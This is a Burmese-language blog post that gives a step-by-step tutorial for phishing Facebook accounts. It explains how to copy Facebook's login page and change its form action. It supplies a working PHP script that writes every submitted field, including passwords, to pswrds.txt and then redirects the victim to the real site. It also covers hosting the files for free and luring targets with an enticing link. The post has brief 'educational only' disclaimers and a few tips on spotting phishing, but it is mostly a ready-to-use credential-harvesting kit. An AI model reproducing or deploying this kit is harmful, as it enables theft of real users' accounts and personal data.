ေဖ့ဘုတ္ အေကာင့္ေပါင္းမ်ားစြာကို Phishing နည္းနဲ႕ ဘယ္လို Hack ၾကမလဲ
ေဖ့ဘုတ္ဆိုတာကေတာ့ အခုေနာက္ပိုင္း ျမန္မာျပည္မွာ ေရပန္းစားလာၿပီးေတာ့ အသံုးမ်ားလာတာျဖစ္ၾကပါတယ္။တကယ္လို႕
အေၾကာင္းတစ္စံုတစ္ရာေၾကာင့္ Hack ခ်င္သူေတြ အတြက္
တင္ေပးလိုက္ပါတယ္။ကၽြန္ေတာ္က Ethical Hacking Tutorials မွာ
တက္ေရာက္ေနတာဆိုေတာ့ သူငယ္ခ်င္းမ်ားအားလံုးကို
အသိေပးခ်င္တာျဖစ္ပါတယ္။ၿပီးေတာ့ ဒီလို Phishing ေတြကို ေရွာင္ရွားနိုင္ဖို႕နဲ႕ နားလည္နိုင္ဖို႕ တင္ေပးတာပါ။
သတိေပးခ်င္တာကေတာ့
ကၽြန္ေတာ္ ဒီနည္းလမ္းကို Educational only သင္ေပးတာျဖစ္ၿပီးေတာ့ အျခားမေကာင္းတဲ့ေနရာေတြမွာ အသံုးခ်တာမ်ိဳးမျပဳလုပ္ၾကပါနဲ႕။
အရင္ဆံုး Phishing နည္းနဲ႕ Facebook အေကာင့္ကို ဘယ္လိုဖမ္းတတ္ၾကသလဲ
(၁) သင့္ကို စိတ္၀င္စားေစမယ့္ ၀က္ဆိုဒ္တစ္ခုကို ဆြဲေခၚသြားမယ္
(၂) အဲဒီေရာက္ရင္ သင္ေဖ့ဘုတ္ဖြင့္ထားရင္ေတာင္ သင့္ေဖ့ဘုတ္အေကာင့္ကို Log in လုပ္ခိုင္းမယ္
(၃) သင္ log in လုပ္လိုက္တာနဲ႔ သင့္ အခ်က္အလက္ေတြအားလံုး(ပက့္၀ါ့၊ဖုန္းနံပါတ္၊လိပ္စာ၊Ad အေကာင့္မွအစ)အားလံုး ရရွိနိုင္ပါတယ္။
သတိေပးခ်င္တာကေတာ့ လံုး၀ မသၤကာရင္ ၀င္မၾကည့္ပါနဲ႕။အေကာင့္ ဖြင့္ထားရက္နဲ႕
ထပ္၀င္ခိုင္းရင္ မ၀င္ပါနဲ႔။Log in with Facebook ခလုတ္ေတြ႕ရင္
မႏွိပ္ပါနဲ႕။အခုေနာက္ပိုင္း ေလာ့အင္ ၀င္စရာမလိုဘဲနဲ႕ ခလုပ္နွိပ္တာနဲ႕
ရနိုင္တဲ့ နည္းေတြရွိပါတယ္။
ဒီလိုနည္းနဲ႕ ဘယ္လို Hack ၾကမလဲ
ပထမဆံုး ေဖ့ဘုတ္ရဲ႕ ေလာ့အင္ ၀င္တဲ့ေနရာကိုသြားပါ။
(ေလာ့အင္ မ၀င္ပါနဲ႕)
ၿပီးရင္ Right Click ႏွိပ္ၿပီးေတာ့ view page source ကိုႏွိပ္ပါ။စာလံုးေတြ အမ်ားႀကီးေပၚလာပါလိမ့္မယ္။Select all လုပ္ၿပီး Note pad ထဲမွာ Paste လုပ္ပါ။
(Note Pad ပါ။Word Pad မဟုတ္ပါ)
ၿပီးရင္ေတာ့ Note pad ထဲမွာ Ctrl+f ႏိွပ္ၿပီးေတာ့ ေဘာက္စ္ေပၚလာရင္ action လို႕ႏွိပ္ၿပီးရွာပါ။အဲဒီေနရာေလး အစိမ္းေရာင္ေလးလင္းေနပါလိမ့္မယ္။Action ေတြ႕ၿပီဆိုရင္ေတာ့ "https//www.facebook.com"
ဆိုတာကို ဖ်က္လိုက္ပါ။ၿပီးရင္ အဲဒီ Note Pad ကို UTF-8 Format
ေျပာင္းၿပီးေတာ့ ဖိုင္ အမ်ိဳးအစားကေတာ့ all file နာမည္ကိုေတာ့ index.html
လို႕နာမည္ေပးၿပီး Save လိုက္ပါ။
ၿပီးရင္ Note Pad ျပန္ဖြင့္ပါ။ေအာက္မွာ ေရးထားတဲ့ စာေတြကို Copy လုပ္ၿပီး Paste ျပန္ခ်ပါ။
<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
ၿပီးရင္ ခုနကအတိုင္း လုပ္ၿပီး နာမည္ကိုေတာ့ login.php လို႕ အမည္ေပးၿပီး Save လိုက္ပါ။
Note Pad ျပန္ဖြင့္ပါ။ဘာမွမေ၇းပါနဲ႕။Save လုပ္ၿပီး နာမည္ကိုေတာ့ pswrds လို႕ေရးၿပီး အမ်ိဳးအစားကိုေတာ့ .txt ပံုစံနဲ႕ပဲ save ပါ။
ၿပီးရင္ Free Hosting Site ေတြကို သြားပါ။Host လုပ္ၿပီးေတာ့ ဒီ
ဖိုင္သံုးခုကို Upload လုပ္လိုက္ပါ။ၿပီးရင္ေတာ့ Host မွာ တစ္ခုခုေရးပါ။
လူတစ္ေယာက္ကိုဖမ္းခ်င္ရင္ေတာ့ စိတ္၀င္စားဖို႕ေကာင္းတဲ့ စာသားေတြေရး ကိုယ့္
Phishing ဆုိဒ္ရဲ႕ လင့္ကိုေပးၿပီးေတာ့ ေဖ့ဘုတ္မွာပဲျဖစ္ျဖစ္
ပို႔စ္တင္ပါ။အဲဒီလူစိတ္၀င္စားၿပီးေတာ့ လိုက္လာရင္ ဖမ္းမိၿပီေပါ့။
သူ log in လုပ္လိုက္တာနဲ႕ သင့္ရဲ႕ pswrds မွာ လိႈ႕၀ွက္နံပါတ္ေတြ ေပၚလာပါလိမ့္မယ္။
မရွင္းတာရွိရင္ေမးပါ။တကယ္လို႕ မလုပ္တတ္ဘူးဆိုရင္လဲ အသင့္လုပ္ၿပီးသားေလးေတြ နမူနာျပပါမယ္။
ျပည္တြင္းက Phishing ဆိုဒ္တစ္ခုကိုလဲ နမူနာျပေပးလိုက္ပါတယ္။လံုး၀ log in မလုပ္ပါနဲ႕။
Knowledge sharing သက္သက္ပါ။သုတက အကိုေတြ၊အမေတြ ေလ့လာမွတ္သားနိုင္ေအာင္ တင္ေပးလိုက္တာပါ။မေကာင္းတဲ့ရည္ရြယ္ခ်က္နဲ႕ေတာ့ အသံုးမျပဳၾကပါနဲ႕လို႕ ေမတၱာ၇ပ္ခံပါရေစ
ေမာင္စိုင္း
(P.S တခ်ိဳ႕သူေတြ ေမာင္စိုင္း နာမည္ကို အသံုးျပဳၿပီးေတာ့
နိုင္ငံေရးဆန္ဆန္စာေတြ ေရးေနပါသည္။ေမာင္စိုင္း နိုင္ငံေရး ဆန္ဆန္စာေတြ
မေရးပါ။နာမည္ အလြဲသံုးခ်ခံရျခင္းျဖစ္ပါသည္။)
No comments:
Post a Comment